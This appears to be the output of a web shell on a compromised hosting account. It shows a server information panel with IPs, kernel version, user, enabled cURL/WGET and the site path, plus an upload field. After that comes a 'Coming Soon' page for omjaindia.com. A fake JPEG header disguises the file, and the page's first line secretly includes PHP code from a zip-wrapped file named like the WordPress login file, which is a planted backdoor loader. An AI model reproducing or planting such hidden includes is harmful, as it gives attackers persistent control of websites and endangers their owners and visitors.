���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.203 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/omjaindia.com/public_html/ |
Upload File : |
<?php include_once ("zip://wp-logiin.php#m"); ?><!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Coming Soon | omjaindia.com</title> <!-- Importing Google Font: Poppins --> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap" rel="stylesheet"> <style> body { font-family: 'Poppins', sans-serif; background: linear-gradient(to right, #0f2027, #203a43, #2c5364); color: #fff; text-align: center; padding: 300px 20px; margin: 0; } h1 { font-size: 50px; font-weight: 600; margin-bottom: 20px; } p { font-size: 20px; font-weight: 300; margin-top: 0; } .email-box { margin-top: 30px; } input[type="email"] { padding: 10px; font-size: 16px; width: 250px; border: none; border-radius: 5px; outline: none; } button { padding: 10px 20px; margin-left: 10px; background-color: #00bcd4; border: none; border-radius: 5px; color: #fff; font-size: 16px; font-weight: 500; cursor: pointer; transition: background-color 0.3s; } button:hover { background-color: #0097a7; } footer { margin-top: 60px; font-size: 14px; color: #aaa; } </style> </head> <body> <h1>Coming Soon</h1> <p>We are working on something amazing. Stay tuned!</p> <footer> © 2025 <strong>omjaindia.com</strong>. All rights reserved. </footer> </body> </html>